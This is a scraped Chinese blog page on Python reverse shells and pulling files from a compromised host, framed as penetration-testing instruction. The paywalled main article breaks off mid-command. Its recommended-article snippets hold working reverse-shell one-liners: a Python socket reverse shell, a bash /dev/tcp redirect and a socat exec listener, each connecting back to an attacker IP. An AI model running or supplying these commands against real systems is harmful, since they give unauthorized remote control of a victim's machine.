Python Security 之 反向Shell

最新推荐文章于 2025-08-20 15:54:13 发布
最新推荐文章于 2025-08-20 15:54:13 发布
阅读量1.3k 收藏 2
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 软件使用 Linux Windows 精华转载 Hack学习 文章标签: python shell 服务器 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/tan6600/article/details/46882549

首先我们先演示使用Python如何利用web服务器的功能,把文件从另一台主机传送过来。
我们假设你有一台傀儡主机,你现在想下载傀儡机上面的的文件。那么你就可以使用shell(或meterpreter)去访问这台傀儡机,你可以通过一行Python代码把傀儡机建立成为一个web服务器,然后下载傀儡机上面的文件.

创建一个python HTTP服务器可以直接使用python的内建函数”SimpleHTTPServer”来创建
你可以使用’-m’参数直接在命令行调用模块,创建的服务器默认是监听的8000端口,但是你可以指定端口,直接在’SimpleHTTPServer’后面跟一个端口参数

python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 80 ...

我们假设你没有防火墙去阻止你的连接,那么你是可以请求到这服务器的数据。你可以在任何目录里面去启动Python HTTP服务器,这样你就能够通过浏览器或者是远程客户端来访问这个目录。但是有些时候就会经常发现你根本没有权限在当前目录写入文件并且初始化这个脚本,但是你可以改变脚本执行的目录.

#使用-O参数,把文件保存在其他目录- /tmp/ 一般可写
wget -O /tmp/shell</
最低0.47元/天 解锁文章

新学期VIP享超值加赠
Python3实现反向Shell
Pad0y的博客
09-28 2206
很多有名的远程控制工具都是基于C/S结构开发的,比如:灰鸽子、冰河、teamViewer等等。通常情况下是将Client作为控制端,Server作为被控端。这里笔者将采用反向连接的方式,将Server作为控制端,Client作为被控端。当然,这两种方式都可以实现功能。这里我采用反向连接的方式主要是考虑到肉鸡在内网中,我们是无法直接连接到被控端的。如果用反向连接的方式,尽管被控端在内网中,只要我们不在内网中,或者我们做了内网端口映射、动态域
Python3 实现可控制肉鸡的反向Shell
git1314的博客
09-29 937
Python3 实现可控制肉鸡的反向Shell 一、初识 1.1 用 Python 实现一个可以管理多个肉鸡的反向 Shell,为什么叫反向 Shell 呢?反向就是肉鸡作为Client主动连接到我们的Server端,以实现对多个远程主机的管理! 学习技能: 了解TCP协议 了解C/S结构程序设计 Python socket模块的使用 Python subprocess模块的...
python 反向shell 编程
悦信安In4sec
03-14 535
服务端(监听端): 建立套接字编程 绑定端口 监听 连接到后门 发送信息(例如命令whoami之类的) 接收到后门返回的信息后门(客服端): 建立套接字 连接服务器 接收服务器返回的信息 处理后返回给服务器程序: 服务端(监听端):#!/usr/bin/python import socket s = socket.socket(socket.AF_INET,socket.SO
Python实现反向Shell
xingxsc的博客
02-08 706
反向Shell的实现也是可以通过python来实现,接下来会用到socket, subprocess来写。
反向shell
weixin_34162228的博客
06-12 584
为什么80%的码农都做不了架构师?>>> ...
HTTP-Reverse-Shell:Python中的HTTP反向Shell
05-22
这是用Python编程的HTTP Reverse Shell。 它用于建立从客户端到服务器端的反向HTTP连接。 先决条件 Python 用法 在客户端上传输客户端程序 在服务器端传输服务器程序 运行服务器端程序以开始侦听 运行客户端程序 ...
利用Python管理Powershell反向Shell的简易方法
此文件标题“powershell-reverse-shell:使用Python处理服务器的简单Powershell反向Shell”所指代的概念,是涉及到网络安全领域中的渗透测试技术。具体来说,这一概念集中在构建一个反向Shell,这是一种远程访问工具...
revshellgen:用Python 3编写的反向shell生成器
02-05
Python 3编写的独立脚本,无需键入即可轻松生成反向shell。 它可以自动完成一些无聊的工作,例如URL编码命令和设置侦听器。 下载 git clone https://github.com/t0thkr1s/revshellgen 安装 该脚本有4个依赖项: ...
Python实现的HTTP反向Shell技术解析
8. 标签解释:在给出的标签“python security reverse-shell http-server Python”中,我们可以解读出该工具主要涉及Python编程语言、网络安全、反向Shell以及HTTP服务器。这些标签指明了项目的主要用途和相关领域。...
Python 反向 Shell 代码分析
weixin_46104215的博客
11-27 1228
import os,socket,subprocess; s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.168.110.130',2222)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i']) s = socket.socket(socket.AF_INET,.
python反向连接shell,可穿透防火墙
07-30
python reverse_shell.py 反弹目的ip 3322 反弹目的ip 执行nc -l 3322 即可连结 被控端
Python-基于socket实现的反向shell攻击后门
Vimor的博客
09-09 5107
下面给出一个基于socket实现的反向shell攻击,或者叫做控制工具吧,简单点说来就是在“受害者”电脑上留一个后门,“攻击者”可以通过这个连接这个socket实现在“受害者”电脑上执行各种指令,再直白一点就是一个socket通信的实例而已。 “受害者“端(后门):backdoor.py,这里充当一个socket服务端程序,主要实现连接的的监听、数据的收发和处理以及指令的执行 #!/u
基于DNS的反向Shell
手牵手科技
04-19 555
Chashell是一个由Go编写的基于DNS进行通信的反向shell。它可用于绕过防火墙或严格限制的网络。 它带有一个名为chaserv的多客户端控制服务器。 chashell 通信安全 每个数据包都使用对称加密(XSalsa20 + Poly1305)进行加密,客户端和服务器之间使用共享密钥。 我们计划在未来实现非对称加密。 协议 Chashell使用Protocol Buffers序列化消息进...
反向Shell
钱国正的专栏
12-24 2788
http://os.51cto.com/art/201312/424378.htm 反向shell(Reverse shell)是一种往远程机器发送shell命令的技术,当远程机器处在防火墙等其它东西后面时,这种技术会变得非常有用。你也许会说,“一个普通的shell或简单的SSH通道不是也能实现这些吗?”不,无法实现。在网上,我看到很多人对普通shell反向shell之间的区别分不清。在我
反向 shell
lyyslsw的专栏
12-27 724
nc -p 4444 -lvv 监听在4444端口, 监听模式, 显示命令执行过程, 假设本机IP地址10.100.125.15 bash -i >& /dev/tcp/10.100.125.15/44440>&1, 假设本机IP地址为10.100.125.14 bash -i : bash的交互模式 当>&后面接文件时,表示将标准输...
反向Shell增强
aakwnam6338的博客
03-11 219
下载socat 在客户端: socat file:`tty`,raw,echo=0 tcp-listen:4444 在服务端: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 如此即可创建功能完全的反向shell 转载于:https://www.cnb...
反向Shell(Reverse Shell
最新发布
shdkfbbv的博客
08-20 407
由于上一步已经把标准输出(1)重定向到了网络 socket,所以现在标准输入(0)也会被重定向到同一个网络 socket。这意味着它会提供一个提示符,并且可以接收用户输入,这是获得一个完整 shell 的前提。目的是让目标机器(执行这条命令的机器)主动连接到攻击者控制的服务器,从而让攻击者。会等待传入的连接,一旦目标执行了那条反向 Shell 命令,这是整个命令的核心,利用了 Bash 的一个特性。就会接收到连接,攻击者就获得了 shell。,可以执行任何目标用户权限允许的命令。都重定向到后面的目标。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值